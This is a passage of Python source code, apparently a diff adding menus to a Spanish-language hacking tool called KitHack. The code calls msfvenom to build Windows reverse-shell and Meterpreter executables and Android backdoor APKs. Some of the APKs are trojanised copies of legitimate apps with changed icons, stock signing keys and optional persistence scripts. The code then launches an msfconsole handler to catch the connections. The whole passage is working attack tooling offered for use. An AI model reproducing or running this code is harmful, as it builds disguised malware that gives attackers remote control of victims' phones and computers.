"systemctl start postgresql && msfvenom -p windows/x64/shell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.exe".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/shell_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "07": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p windows/meterpreter_reverse_http LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.exe".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter_reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "08": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p windows/meterpreter_reverse_https LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.exe".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter_reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "09": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p windows/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.exe".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "10": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p windows/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.exe".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "11": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.exe".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter/reverse_tcp_dns; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "12": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p windows/metsvc_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.exe".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/metsvc_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "13": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p windows/powershell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.exe".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/powershell_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "14": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p windows/shell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.exe".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/shell_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + else: + print("\n{}[X] OPCION INVALIDA\n".format(RED)) + time.sleep(3) + pause("{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("clear") + main() + + elif sys == "03": + print("{0}\n [*] {1}Select Payload:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} android/meterpreter_reverse_http".format( + WHITE, YELLOW)) + print("{0}[02]{1} android/meterpreter_reverse_https".format( + WHITE, YELLOW)) + print("{0}[03]{1} android/meterpreter_reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[04]{1} android/meterpreter/reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[05]{1} android/shell/reverse_http".format( + WHITE, YELLOW)) + print("{0}[06]{1} android/shell/reverse_https".format( + WHITE, YELLOW)) + print("{0}[07]{1} android/shell/reverse_tcp".format(WHITE, YELLOW)) + + pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + pay = pay.zfill(2) + + if pay == "01": + print("{0}\n [*] {1}Select APK Type:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} APK MSF".format(WHITE, YELLOW)) + print("{0}[02]{1} APK ORIGINAL".format(WHITE, YELLOW)) + + a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + a = a.zfill(2) + + if a == "01": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + while (input( + "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + break + else: + Tk().withdraw() + icon = filedialog.askopenfilename( + title="KITHACK - SELECT ICON PNG", + filetypes=(("png files", "*.png"), ("all files", + "*.*")), + ) + print("\n{0}ICON: {1}".format(YELLOW, icon)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + file = open("/tmp/data.txt", "w") + file.write(icon + "\n") + file.write(mainout) + file.close() + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_http LHOST={0} LPORT={1} R > output/payload.apk" + .format(LHOST, LPORT)) + print("{0}[*] Decompiling APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool d -f -o output/payload output/payload.apk" + ) + print("\n{0}[*] Configuring icon change...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; icon"]) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool b output/payload -o output/kithack.apk") + location = os.getcwd() + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) + time.sleep(4) + os.system( + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "rm -rf output/payload output/payload.apk output/kithack.apk" + ) + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n". + format(RED)) + time.sleep(3) + os.system( + "rm -rf output/payload output/payload.apk output/kithack.apk" + ) + pause( + "{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + # Salida de bucle + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_http LHOST={0} LPORT={1} R > output/{2}.apk" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.apk".format(mainout)).st_size != 0: + while var.upper() != "N": + print("\n{0}[*] Generating persistence file...{1}". + format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format( + RED)) + time.sleep(3) + pause("{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif a == "02": + print("{0}\n [*] {1}Select Method:\n".format( + DEFAULT, GREEN)) + print("{0}[01]{1} Use the old Metasploit method".format( + WHITE, YELLOW)) + print("{0}[02]{1} Use the new KitHack method".format( + WHITE, YELLOW)) + + m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + m = m.zfill(2) + + if m == "01": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), + ) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -x {0} -p android/meterpreter_reverse_https LHOST={1} LPORT={2} > output/{3}.apk" + .format(APK, LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat( + "output/{}.apk".format(mainout)).st_size != 0: + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n". + format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif m == "02": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), + ) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating payload...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_http LPORT={0} LHOST={1} R > output/payload.apk" + .format(LPORT, LHOST)) + location = os.getcwd() + print("{0}[*] Decompiling original APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk" + .format(APK, location)) + print("\n{0}[*] Decompiling payload APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool d -f -o output/payload output/payload.apk" + ) + print("\n{0}[*] Configuring RAT Payload...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; rat"]) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool b output/original -o output/kithack.apk") + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) + time.sleep(4) + os.system( + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n". + format(RED)) + time.sleep(3) + os.system( + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) + pause( + "{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + else: + print("\n{}[X] OPCION INVALIDA\n".format(RED)) + time.sleep(3) + pause("{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("clear") + main() + + else: + print("\n{}[X] OPCION INVALIDA\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("clear") + main() + + elif pay == "02": + print("{0}\n [*] {1}Select APK Type:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} APK MSF".format(WHITE, YELLOW)) + print("{0}[02]{1} APK ORIGINAL".format(WHITE, YELLOW)) + + a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + a = a.zfill(2) + + if a == "01": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + while (input( + "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + break + else: + Tk().withdraw() + icon = filedialog.askopenfilename( + title="KITHACK - SELECT ICON PNG", + filetypes=(("png files", "*.png"), ("all files", + "*.*")), + ) + print("\n{0}ICON: {1}".format(YELLOW, icon)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + file = open("/tmp/data.txt", "w") + file.write(icon + "\n") + file.write(mainout) + file.close() + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_https LHOST={0} LPORT={1} R > output/payload.apk" + .format(LHOST, LPORT)) + print("{0}[*] Decompiling APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool d -f -o output/payload output/payload.apk" + ) + print("\n{0}[*] Configuring icon change...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; icon"]) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool b output/payload -o output/kithack.apk") + location = os.getcwd() + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) + time.sleep(4) + os.system( + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 